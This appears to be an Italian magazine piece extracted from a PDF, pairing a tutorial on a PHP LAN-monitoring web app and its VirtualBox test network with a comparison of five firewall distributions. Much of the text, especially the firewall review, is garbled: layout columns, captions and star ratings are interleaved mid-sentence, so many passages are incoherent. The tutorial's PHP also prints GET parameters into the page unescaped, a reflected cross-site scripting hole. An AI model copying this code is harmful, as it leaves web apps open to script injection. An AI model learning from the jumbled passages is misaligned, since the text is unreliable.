$i].”</td>”;
if($numInattivi[$i]!=0)
{
echo “<td><a href=\”inattivi.php?cat=”.$nome
Cat[$i].”&lista=”.$inattivi[$i].”&desc=”.$descInattivi[$i].”\”>”.$numInattivi[
$i].”</a></td>”;
echo “<td><img src=\”red.png\”/></td>”;
}
else
{
echo “<td>0</td>”;
echo “<td><img src=\”green.png\”/></td>”;
}
echo “</tr>”;
}
?>
</table>
Oltre al semaforo rosso, in caso di anomalia di almeno un apparato
verrà creato, nella riga della relativa categoria, un link alla pagina
inattivi.php, alla quale sono passati (con il metodo GET, vedi il box
PHP: GET e POST) il nome della categoria (parametro cat),
l’elenco degli indirizzi IP (parametro lista) e delle descrizioni degli
apparati non raggiungibili (parametro desc). Alla pagina inattivi.php,
che vedremo tra poco, spetta infatti il compito di visualizzare i
dettagli della singola categoria, mostrando all’utente quali sono i
dispositivi rei di aver generato l’allarme.
Virtualbox e test della Webapp
Prima di proseguire con lo sviluppo, tuttavia, possiamo concederci
una piccola gratificazione, verificando l’output prodotto dalla
nostra applicazione. A tal fine, aperto un terminale e acquisiti
i privilegi di root, procediamo all’installazione di Virtualbox
(che configureremo successivamente) mediante il comando:
apt-get install Virtualbox*
Dopo aver avviato Virtualbox, selezioniamo dal menu File la voce
Preferenze, quindi facciamo click sull’icona Rete e selezioniamo
la scheda Reti solo host. Un click sul pulsante Aggiungi rete
solo host determinerà la creazione, sulla macchina fisica,
di un’interfaccia di rete virtuale denominata vboxnet0 (Fig.14).
Facendo click su di essa, ci verrà mostrata una finestra di dialogo
composta da due tab:
Nella prima, denominata Scheda, inseriamo 192.168.2.3
come indirizzo IPv4 e 255.255.255.0 come maschera di rete;
Nella seconda, denominata Server DHCP, deselezioniamo
il flag Abilita il server, poiché in questa serie faremo ricorso
a indirizzi statici, come da schema in Fig.1.
La nostra interfaccia di rete virtuale è pronta: nel prosieguo,
utilizzeremo vboxnet0 per la connettività verso le macchine
 Mettere in sicurezza la LAN
virtuali che rappresentano i server della rete da monitorare; ai fini
della verifica della Web application, tuttavia, è sufficiente per ora
assegnare alla scheda virtuale un indirizzo di rete. Dalla shell
dotata di privilegi di root, pertanto, digitiamo il comando:
# ifconfig vboxnet0 192.168.2.3/24
Prima di effettuare la verifica dell’applicazione, tuttavia,
è opportuno procedere a una configurazione aggiuntiva,
necessaria nella prossima fase di configurazione dell’ambiente
di test: reiteriamo quindi il processo appena visto, al fine di creare
una seconda interfaccia di rete virtuale, vboxnet1, a cui affidare
il collegamento con il NAS della rete di test. I parametri
da impostare sono i seguenti:
Tab Scheda: inseriamo 192.168.1.3 come indirizzo IPv4
e 255.255.255.0 come maschera di rete;
Tab Server DHCP: deselezioniamo il flag Abilita il server.
Assegnato l’indirizzo a vboxnet1, con il comando:
# ifconfig vboxnet1 192.168.1.3/24
possiamo avviare il browser, facendolo puntare all’indirizzo Fig.15 Ecco come appare la pagina principale della nostra Web
http://127.0.0.1/~nomeutente/monitoraggio.php application, prima della configurazione del nostro ambiente di test:
(es. http://127.0.0.1/~garrick/monitoraggio.php), i tanti semafori rossi sono dovuti proprio all’irraggiungibilità degli
e visualizzare così il risultato dei nostri sforzi di programmazione. apparati di rete
Come è lecito aspettarsi (Fig.15), un’unica categoria
(le workstation, che comprende la sola macchina ove sulla distribuzione Damn Small Linux. L’ultimo passo consiste nella
è in esecuzione l’applicazione Web) risulta pienamente operativa configurazione del disco fisso: volendo adoperare delle distribuzioni live,
(semaforo verde), mentre le altre mostrano alert concernenti possiamo scegliere l’opzione Non aggiungere un disco fisso
l’impossibilità di raggiungere i relativi apparati. virtuale. Premendo quindi il pulsante Crea per completare il processo
di creazione della macchina virtuale, riceveremo un avviso da parte
L’ambiente di test di Virtualbox in merito all’ovvia impossibilità di procedere, in assenza
Per consentire alla Web application di mostrare quattro semafori del disco fisso, all’installazione di un sistema operativo. Ignorato
verdi è necessario procedere alla configurazione di quattro il messaggio mediante la pressione del pulsante Continua, possiamo
macchine virtuali, che simulino gli apparati indicati in Fig.1 quindi dedicarci all’impostazione dell’unità di boot della macchina
con il nome di NAS, Router, ServerA e ServerB, aggiungendosi virtuale, il cui processo di creazione è finalmente terminato.
alla macchina fisica su cui stiamo lavorando (e alla quale Selezioniamo la macchina virtuale nella finestra principale di Virtualbox,
affideremo l’onere di simulare il computer denominato quindi clicchiamo il pulsante Impostazioni per poi scegliere la voce
Workstation). Al fine di semplificare e velocizzare questa fase, Archiviazione. Cliccando sull’icona del CD comparirà, nella parte
ricorreremo a quattro macchine virtuali basate su distribuzioni live, destra della finestra di dialogo, il pulsante di un CD/DVD virtuale
in modo da evitare l’onerosa operazione di installazione, la cui (Fig.16), grazie al quale è possibile impostare l’ISO di DSL come
descrizione non rientra negli scopi di questa serie. In particolare, dispositivo virtuale. Terminata questa operazione, possiamo dedicarci
faremo ricorso alle seguenti distribuzioni live: alla configurazione della scheda di rete, per la quale è necessaria una
Damn Small Linux (la cui ISO può essere scaricata all’URL doverosa premessa. La GUI di Virtualbox consente di assegnare
http://www.damnsmallinux.org/download.html), a ogni macchina virtuale fino a 4 schede di rete, ognuna delle
per la simulazione dei due server e del NAS; quali attestabile a un diverso network: esistono diverse tipologie
Xubuntu 14.04 LTS (la cui ISO può essere scaricata all’URL di network. In questa sede, in particolare, faremo ricorso alle sole
http://xubuntu.org/getxubuntu) per simulare il router. modalità Scheda solo host (per i collegamenti tra la macchina
La scelta di queste distribuzioni non è casuale: fisica e le macchine virtuali a questa direttamente connesse)
Damn Small Linux è caratterizzata dall’esiguità delle richieste e rete interna (per i collegamenti tra le schede di rete
hardware (richiede appena qualche decina di MB per partire) appartenenti a macchine virtuali distinte). In particolare,
e, pertanto, ci consente di simulare ben tre client senza appesantire
eccessivamente la macchina fisica;
Xubuntu 14.04 LTS dispone, già in modalità live, degli
strumenti necessari per agire da router per i server simulati
con Damn Small Linux.
Stabilite le distro di riferimento, possiamo procedere alla creazione
delle macchine virtuali. Iniziamo dal NAS: dalla schermata principale
di Virtualbox, facciamo click sul pulsante Nuova per avviare
il processo di creazione, quindi inseriamo, nella finestra dialogo
che comparirà, il nome della macchina virtuale (NAS), il sistema
operativo (Linux) e la relativa versione (Linux 2.4 a 32 bit). Un click
sul pulsante Avanti ci consente di passare alla schermata
di dimensionamento della RAM da assegnare alla macchina virtuale:
come premesso, è sufficiente procedere all’assegnazione di appena Fig.16 La schermata per la configurazione di un’unità CD/
64 MB per consentire l’operatività di una macchina virtuale basata DVD virtuale basata su file ISO

75
 Sicurezza di rete
Fig.17
Una volta creato
e configurato
l’ambiente
di test, la pagina
principale della
nostra Web
application
ci gratificherà con
quattro semafori
verdi!
simuleremo la topologia di rete rappresentata in Fig.1 mediante:
Una rete interna, per la connessione tra i server e il router;
Due reti solo host, per la connessione tra la workstation (simulata
dalla macchina fisica) e le macchine virtuali NAS e Router.
Per configurare la scheda di rete della macchina virtuale DSL
che simula il NAS è quindi necessario:
Accedere alle impostazioni della macchina virtuale;
Selezionare la sezione Rete: nella parte desta della finestra
di dialogo apparirà la schermata di configurazione delle interfacce
di rete, suddivisa in schede. Di default, ogni macchina virtuale dispone
di un’unica interfaccia abilitata, denominata Scheda 1, sebbene
le altre possano essere attivate mediante un click sulla relativa scheda,
seguito dalla spunta della voce Abilita scheda di rete;
Dal menu a tendina denominato Connessa a, selezionare
la modalità Scheda solo host, e verificare che il nome comparso nella
zona sottostante coincida con vboxnet1;
Premere il tasto OK per completare l’operazione.
Siamo finalmente pronti per avviare la macchina virtuale, mediante
la pressione del pulsante Avvia! di Virtualbox: a startup avvenuto,
clicchiamo sulla schermata nera per consentire alla macchina
virtuale di assumere il controllo di mouse e tastiera. In questa fase,
possiamo tranquillamente ignorare eventuali messaggi di
avvertimento visualizzati da Virtualbox: per restituire le periferiche
alla macchina fisica, infatti, è sufficiente la pressione del tasto CTRL
destro. Prima di avviare il boot vero e proprio Damn Small Linux
presenta una schermata per la selezione delle modalità di
caricamento del sistema operativo: premendo INVIO, otterremo in
pochi istanti la visualizzazione del desktop spartano di questa
distribuzione. Per configurare correttamente i parametri di rete della
macchina virtuale è necessario avviare una console con diritti di root:
a tal fine, dopo aver cliccato con il pulsante sinistro in qualsiasi
punto del desktop, selezioniamo le voci Xshell | root access |
transparent del menu a tendina così ottenuto. Dal terminale
visualizzato, abilitiamo l’unica scheda di rete assegnata alla macchina
virtuale mediante il comando:
#ifconfig eth0 up
seguito dall’assegnazione dell’indirizzo IP e della relativa netmask alla
suddetta scheda di rete, attraverso il comando
#ifconfig eth0 192.168.1.100 255.255.255.0
Le restanti macchine virtuali da simulare mediante il ricorso a
DSL devono essere configurate in maniera analoga. In
particolare, le impostazioni da scegliere in sede di creazione della
macchina indicata in Fig.1 con il nome di serverA sono le
seguenti caratteristiche:
Nome macchina virtuale: serverA;
Sistema operativo: Linux 2.4 a 32 bit;
76
RAM: 64 MB;
Disco fisso: nessuno;
Archiviazione: come per la macchina virtuale NAS;
Rete: una scheda di rete, connessa alla rete interna
di nome intnet.
I comandi necessari per la configurazione della scheda di rete
(da terminale dotato dei privilegi di root) sono riepilogati di seguito:
#ifconfig eth0 up
#ifconfig eth0 192.168.3.101 255.255.255.0
# route add default gw 192.168.3.1
Rispetto alla macchina NAS, notiamo come sia stata necessaria
la selezione di un default gateway (nello specifico, la macchina indicata
in Fig.1 con il nome Router), al fine di consentire la comunicazione
del server con la workstation di monitoraggio. Sulla falsa riga di quanto
appena operato, è possibile procedere alla creazione della macchina
virtuale che simulerà serverB, impostando i medesimi parametri
di serverA (a eccezione, ovviamente, del nome!). Anche la
configurazione della scheda di rete è pressoché identica:
#ifconfig eth0 up
#ifconfig eth0 192.168.3.100 255.255.255.0
# route add default gw 192.168.3.1
La macchina virtuale denominata “router”, basata su Xubuntu 14.04,
merita invece una trattazione separata: avviato il processo di creazione
della macchina virtuale, è necessario selezionare la corretta versione
del sistema operativo (Linux Ubuntu a 32 bit oppure Linux Ubuntu
a 64 bit, a seconda della versione scaricata dal sito), quindi assegnare
un’adeguata quantità di memoria (512 MB dovrebbero essere
sufficienti) alla macchina virtuale. Per quanto concerne il networking,
occorre configurare due schede di rete, necessarie, rispettivamente,
a garantire la connettività verso le due macchine virtuali Damn Small
Linux e verso la macchina fisica (che simula la postazione denominata
workstation). In particolare:
La prima scheda di rete deve essere connessa alla rete interna
di nome intnet;
La seconda scheda deve essere configurata come scheda solo
host, e collegata alla rete denominata vboxnet0. Al termine del boot
della macchina virtuale, verrà presentato il desktop tipico della
distribuzione; avviato un terminale, possiamo quindi provvedere a:
Impostare l’indirizzo delle due schede di rete, con i comandi
# sudo ifconfig eth0 192.168.3.1 255.255.255.0
# sudo ifconfig eth1 192.168.2.1 255.255.255.0
Abilitare il routing (necessario a garantire la raggiungibilità dei server
dalla workstation, e viceversa), mediante il comando
#sudo sysctl -w net.ipv4.ip_forward=1
Per completare la procedura di creazione del nostro ambiente di test
non ci resta che configurare le rotte della macchina fisica,
consentendo in tal modo a quest’ultima di contattare (e monitorare)
i server della rete, sebbene attestati su una subnet differente:
#route add -net 192.168.3.0/24 gw 192.168.2.1
L’applicazione completa
È giunto il momento di vedere all’opera, sull’intera rete di test, la nostra
applicazione di monitoraggio: aggiornando la pagina disponibile
all’indirizzo http://127.0.0.1/~nomeutente/monitoraggio.php
(es. http://127.0.0.1/~garrick/monitoraggio.php) o avviando
nuovamente il browser per visualizzarla una seconda volta, vedremo
finalmente una schermata priva di semafori rossi (Fig.17).
Per verificare la piena operatività della nostra Web application, tuttavia,
è opportuno effettuare almeno un test aggiuntivo: dal terminale di root
sin qui utilizzato su serverB, digitiamo il comando
#ifconfig eth0 down
al fine di disabilitare la scheda di rete, rendendo di conseguenza

Fig.18 Se simuliamo il malfunzionamento di serverB,
disabilitandone la scheda di rete, la nostra applicazione ci mostrerà
un singolo semaforo rosso, associato alla categoria server
irraggiungibile, dalla nostra workstation di monitoraggio, il server
in questione. Come dovrebbe reagire l’applicazione di fronte a questo
improvviso “guasto”, simulato mediante la disabilitazione della scheda
di rete? La risposta è in Fig.18 dove, a fronte di tre semafori verdi,
è mostrato chiaramente un unico semaforo rosso, proprio nella
categoria server. In particolare, possiamo notare la corretta
indicazione, nella colonna Inattivi, del numero di server (solamente
un’unità) risultati irraggiungibili: se clicchiamo sul relativo link, tuttavia,
ci viene restituita una pagina di errore, in quanto non abbiamo ancora
provveduto alla scrittura della pagina PHP richiamata dalla tabella
di monitoraggio (inattivi.php). A questa pagina spetta il compito
di riepilogare, per una data categoria, la lista degli apparati (completi
di indirizzo IP e descrizione) non raggiungibili dalla workstation.
Tale operazione, di per sé tutt’altro che banale, risulta tuttavia
abbastanza semplice, grazie al lavoro svolto dalla homepage
dell’applicazione che, come mostrato nel paragrafo Il codice PHP,
salva in apposite stringhe le informazioni cruciali di cui necessita
la pagina inattivi.php:
Il nome della categoria;
La lista degli indirizzi IP degli apparati irraggiungibili;
La lista delle relative descrizioni.
Tali informazioni sono quindi inserite dinamicamente nel link alla
pagina inattivi.php, a cui giungono comodamente attraverso il metodo
GET. La pagina, pertanto, non deve far altro che:
1 Recuperare il nome della categoria e visualizzarlo: il link presentato
dall’homepage della Web application è del tipo http://127.0.0.1/inattivi.
php?cat=NOME_CATEGORIA&lista=LISTA_IP_
APPARATI&desc=DESCRIZIONE_APPARATI e, pertanto, il nome
della categoria, è direttamente accessibile attraverso l’elemento
$_GET[“cat”] dell’array associativo $_GET[], da stampare a video:
<h1 style=”text-align : center”>Apparati inattivi della categoria
<?php echo $_GET[“cat”]; ?></h1>
2 Separare “in token” la lista degli indirizzi IP e la lista delle descrizioni:
la lista degli indirizzi IP e la lista delle descrizioni degli apparati non
raggiungibili di una data categoria, sono passate alla pagina inattivi.php
sottoforma di stringhe (denominate, rispettivamente, lista e desc).
All’interno di tali stringhe, le informazioni di un singolo apparato
(ovvero l’indirizzo IP di un dato apparato inattivo, oppure la sua
descrizione) sono distinguibili dalle altre, come abbiamo avuto modo
di notare in precedenza, grazie all’utilizzo del separatore costituito
dal carattere ; (punto e virgola): non ci resta dunque che “esplodere”
la stringa sfruttando questa sua peculiare organizzazione, ovvero
sottoporla all’operazione nota nel mondo della programmazione
Mettere in sicurezza la LAN
con il nome di tokenizzazione. È proprio quanto ci consente di fare
la funzione PHP denominata explode() che, ricevuti come parametro
il carattere separatore e la stringa da tokenizzare, restituisce un array
contenente i singoli elementi (detti appunto token) della stringa:
/* scompone nei singoli elementi le stringhe contenenti gli IP e le
descrizioni dei dispositivi inattivi, passati dalla pagina di monitoraggio */
$ip=explode(‘;’, $_GET[“lista”]);
$desc=explode(‘;’, $_GET[“desc”]);
3 stampare a video la tabella dei dispositivi inattivi: poste negli array
$ip e $desc le informazioni d’interesse (rispettivamente l’indirizzo IP
e la relativa descrizione) sugli apparati inattivi di categoria, non ci resta
che stamparli a video, attraverso un apposito ciclo di creazione della
tabella html che riepiloga i risultati del monitoraggio:
/* per ogni apparato passato dalla pagina di monitoraggio...*/
for($i=0; $i<count($ip)-1;$i++)
{
/*... crea una riga della tabella esplicitandone indirizzo IP
e descrizione*/
echo “<tr>”;
echo “<td>”.$ip[$i].”</td><td>”.$desc[$i].”</td>”;
echo “</tr>”;
}
Una volta salvato all’interno della directory public_html possiamo
visualizzare nuovamente la nostra homepage (senza riattivare
la scheda di rete di serverA) e selezionare il link relativo alla categoria
server: questa volta verrà visualizzata la pagina corretta, mostrandoci
l’indirizzo e la descrizione del server irraggiungibile.
Miglioriamo la nostra applicazione
Tornando alla homepage, ci verrà restituita nuovamente la pagina
rappresentata in Fig.18: per completare il test delle funzionalità della
nostra Web application, dovremmo quanto meno verificarne
il comportamento al ripristino della connettività di serverA.
Dalla shell di root sin qui utilizzata su serverA, eseguite:
#ifconfig eth0 up
#ifconfig eth0 192.168.3.101 255.255.255.0
# route add default gw 192.168.3.1
consentendo in tal modo la raggiungibilità di serverA da parte della
macchina workstation. Qual è la risposta della nostra applicazione?
Come possiamo verificare tornando al browser, l’applicazione
ci mostrerà la situazione reale (quattro semafori verdi, come
in Fig.17) solo a seguito dell’aggiornamento manuale dell’homepage,
effettuata dall’utente premendo l’apposito pulsante del browser
oppure il tasto F5: un tale comportamento è, ovviamente,
inaccettabile per una applicazione di monitoraggio, che deve riportare
dinamicamente, in maniera tempestiva e puntuale, ogni modifica
intercorsa nella rete. Per ovviare all’inconveniente, possiamo imporre
alla pagina monitoraggio di aggiornarsi a intervalli regolari
(per esempio, ogni trenta secondi) facendo ricorso al cosiddetto meta
refresh HTML. Tale soluzione è basata sull’impiego di un meta tag
HTML: il codice
<meta http-equiv=”refresh” content=”30”>
se posto nell’intestazione della pagina di monitoraggio (la sezione
compresa tra i tag <head> e </head>), impone al browser
di ricaricare la stessa ogni 30 secondi, consentendoci in tal modo
di rispecchiare tempestivamente ogni disconnessione di un apparato
della rete. Possiamo dunque dirci, finalmente, soddisfatti della nostra
applicazione? La risposta ovviamente è no: per quanto funzionale
ai semplici scopi che ci siamo prefissi, la Web application è suscettibile
di consistenti modifiche, al fine di garantire una maggiore efficienza
e una maggiore usabilità. Non vi resta che installare un buon editor
PHP e iniziare a programmare!
77
 Sicurezza di rete

La distro giusta
per i firewall
Per proteggere la vostra rete non potrete certo costruire un fossato che la
circondi. Molto meglio utilizzare una distro firewall. Scoprite qual è la migliore

Modalità del test

Tutte le distro scelte possono essere
provate in un vero PC di riserva.
Se non avete una macchina
da destinargli, usate VirtualBox.
Andate in File D Preferenze D
Rete. Passate alla scheda Reti solo
host e aggiungete una nuova
infrastruttura. Fate click sull’icona
a forma di cacciavite e impostate
l’indirizzo 192.168.56.1. Adesso
create una nuova macchina virtuale
per la distro firewall, facendo
in modo che usi due schede di rete.
La prima impostata come Scheda
con bridge e la seconda Scheda
solo host. Dopo aver installato
la distribuzione, assegnate l’IP
192.168.56.2 alla seconda periferica,
utilizzando la configurazione
con server DHCP e intervallo
tra 192.168.56.20-192.168.56.50.
Qualunque macchina virtuale
collegata alla scheda solo host,
passerà per il firewall.

P
er aver bisogno di un firewall, molto costose, si tratta di software piccoli dettagli. Non sono semplici
non è necessario essere basilari e scarsamente configurabili. da installare e configurare, ma una volta
amministratori di una grande Da questo punto di vista, il Pinguino presa confidenza con le funzioni
rete aziendale. Certo, ci viene in aiuto. In Rete esistono presenti, potrete davvero sentirvi
la vostra distro Linux avrà gli strumenti molte distro pensate esclusivamente al sicuro. Abbiamo selezionato cinque
adatti per proteggervi dalle intrusioni. per funzionare come firewall. Hanno distribuzioni di questo genere.
Tuttavia è bene ricordare che questo strumenti potenti, sono personalizzabili Nel nostro confronto ne analizzeremo
La nostra arsenale è ristretto alla sola custodia del e consentono di mettere mano alle le peculiarità, mettendo l’accento
selezione PC su cui state lavorando. Rimangono impostazioni di protezione fin nei più sui pro e i contro di ciascuna soluzione.
IPFire al di fuori tutti gli apparecchi che
OPNsense
pfSense
si collegano alla LAN. I router mettono
a disposizione il proprio firewall per
“In Rete ci sono decine di distro
Sophos UTM
Untangle NG
tenere alla larga chi tenta di attaccare
l’infrastruttura. Ciò nonostante, a meno
che si occupano di mettere
Firewall
di non acquistare soluzioni professionali al sicuro la vostra rete locale”
78
 Un muro anti-intrusioni

La sicurezza
Sono delle buone sentinelle?

I
l kernel di IPFire è reso ancora più
potente dal set di patch grsecurity
che contrasta gli exploit zero-day.
La distribuzione, inoltre, può dividere
le reti basate sui rispettivi livelli
di sicurezza. In più, consente
di generare criteri personalizzati
per ciascuna infrastruttura. Per un
controllo più elaborato, niente vieta
di gestire l’accesso in uscita
da qualsiasi segmento. IPFire utilizza
un firewall Stateful Packet Inspection
(SPI), costruito basandosi su netfilter
che contribuisce al filtraggio e alla
manipolazione dei pacchetti negli
impianti NAT (Network Address
Translation). È possibile configurare
il firewall per far fronte a qualsiasi
evenienza. La wiki del progetto
contiene una guida introduttiva molto
pratica da seguire, con tanto di
indicazioni sulle regole di protezione
per gli scenari più comuni. pfSense
utilizza anch’essa un firewall stateful
e può filtrare il traffico dalla sorgente
alla destinazione IP, analizzando poi
tutto il flusso TCP e UDP. Offre varie
opzioni per la gestione dei diversi
parametri. Consente inoltre di limitare
le connessioni simultanee per ogni
regola. Questa distro utilizza l’utility
OS fingerprinting p0f per setacciare
il passaggio dati in base al sistema
operativo. Si possono gestire i log
per il traffico che corrisponde
a ciascuna regola impostata.
OPNsense è praticamente una fork
di pfSense e sfrutta le stesse
caratteristiche. Sophos UTM,
per impostazione predefinita
e a differenza dei concorrenti, sbarra
subito tutto il transito di informazioni.
Potete gestire nel dettaglio cosa
far passare, lasciando il resto delle
opzioni invariate. Il server include un
innovativo filtro Web incentrato sulle
Con Sophos si possono applicare blocchi di livello
nazionale senza difficoltà
categorie. Il suo ruolo consiste
nel bloccare i siti in base ai contenuti Verdetto
(nudità, armi, violenza e via dicendo).
Inoltre è in grado di eseguire una IPFire
scansione delle pagine Internet e dei HHHHH
OPNsense
POP3 alla ricerca di virus. Il firewall HHHHH
di Untangle si distingue per pfSense
la semplicità di configurazione. Grazie HHHHH
all’interfaccia intuitiva, regolate ogni Sophos UTM
parametro senza particolari difficoltà.
HHHHH
Untangle NG
Controllate tutto il traffico in modo Firewall
dettagliato, circoscrivendo un sistema HHHHH
di regole complesse per non lasciare Sophos
niente al caso. Sfruttando menu si dimostra
a discesa molto flessibili, il processo un passo avanti
agli altri.
diventa alla portata di tutti.

Altre funzioni
Non solo firewall...

L
e distro di questo confronto server di infrastruttura, filtro OpenVPN e PPTP. È possibile
hanno molte altre funzioni di contenuti, proxy, server caching utilizzare il server di Sophos UTM
rispetto al solo firewall. name e molto altro ancora. come soluzione site-to-site VPN,
Alcune offrono add-on gratuiti, Quando viene utilizzato come configurandolo poi per gestire
mentre altre preferiscono farli gateway Internet, la distro le connessioni VoIP. Untangle
pagare. Nel nostro caso, è in grado di connettersi tramite non include fin da subito tutti
ci concentreremo solo sulle svariate tecnologie a banda larga: i componenti disponibili. Il primo
soluzioni a costo zero. IPFire può VDSL, ADSL, Ethernet, 3G e 4G. avvio, comunque, consente Verdetto
essere usato come gateway VPN, Tra i plug-in più interessanti di utilizzare una dozzina
per pfSense di applicazioni e servizi. Tra questi IPFire
e OPNsense ci troviamo Web Filter, Virus Blocker,
HHHHH
OPNsense
sono il Traffic Spam Blocker, il controllo per la HHHHH
Shaper , la gestione della banda, la verifica pfSense
regolazione delle applicazioni, il captive portal HHHHH
della banda e molto altro. Alcuni tra i plug-in Sophos UTM
HHHHH
e la possibilità che non si trovano nella prima Untangle NG
di gestire VPN. installazione sono l’Ad Blocker Firewall
Entrambe e il sistema per la previsione delle HHHHH
le distro intrusioni. Inoltre, a differenza Untangle
offrono tre delle altre distro, alcuni add-on perde questo
opzioni per la tra i più interessanti sono round a causa
di plug-in
connettività su disponibili soltanto per una prova interessanti ma
Alcuni componenti di Untangle hanno un periodo Virtual Private gratuita di 14 giorni. Dopo dovrete a pagamento.
di prova limitato a 14 giorni Network: IPsec, acquistarli.

79
 Sicurezza di rete

Semplicità d’uso
Hanno una curva di apprendimento ripida?

S
ebbene mantenere un server sia
di per sé un’operazione non adatta
a tutti, il processo d’installazione
viene semplificato dal non dover
configurare alcuna partizione. Le distro
firewall di questo confronto fanno di tutto
per aiutarvi a modellare il processo
di montaggio secondo la vostra
configurazione di rete. Usano un’interfaccia
grafica Web capace di rendere la
definizione dei parametri molto intuitiva.
Sotto questo punto di vista, avere una GUI
è essenziale. Un ambiente di gestione
contorto e organizzato in modo
approssimativo porta solo a fare
confusione. Ci siamo concentrati sulla
semplicità d’uso che deve rispecchiare
le esatte potenzialità di ciascuna soluzione.

IPFire  HHHHH
IPFire ha un processo d’installazione piuttosto semplice. Il programma
rileva il numero di schede di rete collegate al computer e vi chiede
di assegnarle a una delle quattro zone colorate. Ognuna si rivolge
a un gruppo di macchine che condivide un livello di sicurezza comune.
Successivamente dovrete scegliere un indirizzo IP per il NIC collegato
alla LAN, quindi decidere se utilizzare il DHCP. Una volta montata
la distro, potete accedere alla sua interfaccia di gestione. Basta inserire
nel browser l’indirizzo IP dato alla scheda di rete connessa. Per definire
le regole, spostatevi nella scheda Firewall. Nonostante l’ambiente
grafico sia piuttosto semplice, la distribuzione richiede una certa
esperienza per essere sfruttata al meglio. Dovrete per forza passare
qualche ora in compagnia della documentazione.

OPNsense  HHHHH
Come abbiamo già accennato, questa distro è una fork di pfSense.
La procedura d’installazione è quindi la stessa. Una volta avviata,
vi troverete faccia a faccia con il prompt dei comandi. Da qui potrete
recuperare l’indirizzo della console di amministrazione funzionante nel
browser. Verrete accolti da una breve procedura guidata per impostare
la configurazione di rete. Dopo il riavvio del sistema, spostatevi nella
sezione Rules sotto Firewall. Ci sono una serie di regole che possono
essere abilitate spostando il cursore dedicato. Per ognuna è disponibile
una breve descrizione. Allo stesso modo, la configurazione degli
elementi aggiuntivi segue la filosofia della massima semplicità.
La funzione di ricerca vi aiuterà a trovare le tante opzioni presenti.

Servizi a pagamento
Cosa si ottiene aprendo il portafogli? Verdetto

T
utte le distro prese in
considerazione offrono servizi
a pagamento. IPFire fornisce
un sistema di supporto esteso per le
imprese che utilizzano il firewall per
scopi professionali. L’azienda, inoltre,
mette a disposizione dispositivi
hardware personalizzati che si
integrano alla perfezione
con l’infrastruttura di rete.
OPNsense ha diverse opzioni
di supporto commerciale.
L’abbonamento annuale per
IPFire
l’assistenza alle imprese costa di 40 corsi online che prendono in
HHHHH
299 €. Ci sono altri servizi progettati considerazione svariati aspetti della OPNsense
per le realtà più grandi che distro. I costi variano in base agli HHHHH
necessitano di una maggiore argomenti. Quello introduttivo costa pfSense
personalizzazione. Per pfSense 249 $ (226 €). Untangle si HHHHH
Sophos UTM
si possono acquistare pacchetti concentra maggiormente sui propri HHHHH
di supporto specifici. Questi add-on a pagamento. Se acquistate Untangle NG
includono assistenza tecnica e alla il pacchetto completo, dovrete Firewall
prima configurazione. Sophos sborsare 50 $ al mese (45 €). In più, HHHHH
UTM si rivolge alle macro aziende, niente vieta di comprare soluzioni Tutte offrono
mettendo a disposizione appoggio hardware già configurate con ottimi servizi
a pagamento.
on-site tramite i propri rivenditori sul il firewall. Vanno da 399 $ (362 €) Basta scegliere.
territorio. Sophos, inoltre, offre più a 7.600 $ (6.900 €).

80
 Un muro anti-intrusioni
pfSense  HHHHH
Le distro basate su FreeBSD come pfSense e OPNsense usano
gli stessi installer. Si tratta di procedure piuttosto automatizzate
che non richiedono una conoscenza troppo marcata del comparto.
pfSense, tuttavia, ha più opzioni avanzate, tra cui la possibilità
di installare un kernel personalizzato. La GUI di controllo permette
di configurare l’interfaccia di rete installata nella macchina.
Una volta fatto, accedendo alla console del browser, sarete in grado
di seguire una procedura guidata che definisce i principali aspetti
del firewall. L’ambiente, purtroppo, non è dei più intuitivi. Impostare
una semplice regola può richiedere diverse decine di minuti.
Per fortuna il progetto dispone di un’ottima documentazione.

Sophos UTM  HHHHH

Originariamente conosciuto come Astaro Security Gateway,
prima di scaricare la ISO di Sophos UTM, è necessario
registrarsi sul sito Web del progetto e ottenere una licenza
d’uso. Quest’ultima andrà poi caricata nel server durante la
procedura di configurazione. Sophos richiede di selezionare
una scheda di rete connessa alla LAN, quindi dovrete
assegnargli un indirizzo IP da utilizzare per l’accesso
all’interfaccia di controllo. Una volta installata, la distro blocca
tutto il traffico in entrata e in uscita. Potrete analizzare nel
dettaglio cosa lasciar passare. Si tratta di un approccio più
macchinoso rispetto alle altre soluzioni, ma senza dubbio
è il migliore per quanto riguarda la sicurezza.

Untangle NG Firewall  HHHHH

Questa distro basata su Debian è molto semplice da
installare. Si tratta dell’unica soluzione che dopo il processo
di montaggio vi accoglie con un’interfaccia Web. Potrete così
portare a termine la procedura guidata. Viene chiesto
di impostare la password per l’utente amministratore, quindi
scegliere e configurare le due reti. Una si collega alla LAN,
mentre l’altra a Internet. Quasi tutte le applicazioni sono
preconfigurate ed eseguite automaticamente dopo
l’installazione. Siete perfino in grado di gestire
la configurazione di ogni applicazione. Basta fare click
sul pulsante Settings sotto ciascuna voce.

Supporto e documentazione
Avete bisogno di aiuto? Verdetto

T
utte le distro del nostro
confronto offrono una buona
dose di documentazione.
Trovate guide, wiki, forum e molto
altro ancora. Al supporto ufficiale
si affiancano poi numerosi tutorial
di appassionati. Il progetto IPFire
ha una wiki molto dettagliata.
I forum in inglese e tedesco sono
altrettanto nutriti. C’è poi un canale
IRC dedicato che si aggiunge
ad alcune mailing list. OPNsense
dispone di un forum, una wiki e un
canale IRC. La documentazione la maggior parte dei quali si IPFire
copre qualsiasi aspetto della distingue per chiarezza e semplicità.
HHHHH
OPNsense
distribuzione. In più sono disponibili Il progetto di sviluppo è molto attivo HHHHH
dozzine di HOWTO con i dettagli anche sui social. Su Reddit, per pfSense
per le configurazioni più utilizzate. esempio, trovate sempre un aiuto HHHHH
La migliore fonte d’aiuto per pfSense in presa diretta. Il sito Web di Sophos Sophos UTM
HHHHH
è senza dubbio il manuale ufficiale. ospita i PDF che compongono sia Untangle NG
Peccato che venga fornito solo dopo la guida rapida, sia il tomo di 600 Firewall
aver sottoscritto un abbonamento pagine dedicato agli amministratori HHHHH
Gold. Per chi non vuole spendere, di sistema. Non mancano numerosi Cinque stelle
trovate wiki, forum, mailing list articoli che trattano dei diversi a tutti. Il supporto
e canale IRC. Nella wiki è presente aspetti della distro. Untangle mette è davvero al top
per ogni progetto.
una vasta collezione di HOWTO, a disposizione forum, FAW e wiki.

81
 Sicurezza di rete

Manutenzione ed estensioni
Aggiornamenti e componenti aggiuntivi

U
n server firewall, proprio come e aggiornare i componenti. Questi
qualsiasi altro sistema simile, sono raggruppati per categorie che
ha bisogno di manutenzione fanno riferimento ai vari comparti:
